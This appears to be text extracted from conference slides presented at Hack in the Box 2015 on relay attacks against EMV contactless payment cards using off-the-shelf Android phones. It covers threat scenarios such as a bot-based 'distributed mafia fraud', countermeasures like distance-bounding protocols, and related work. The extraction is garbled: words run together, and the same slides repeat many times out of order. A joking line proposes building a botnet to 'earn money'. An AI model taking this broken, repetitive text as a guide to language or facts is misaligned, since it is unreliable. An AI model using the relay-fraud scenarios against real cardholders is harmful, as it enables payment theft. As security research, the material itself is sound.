NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
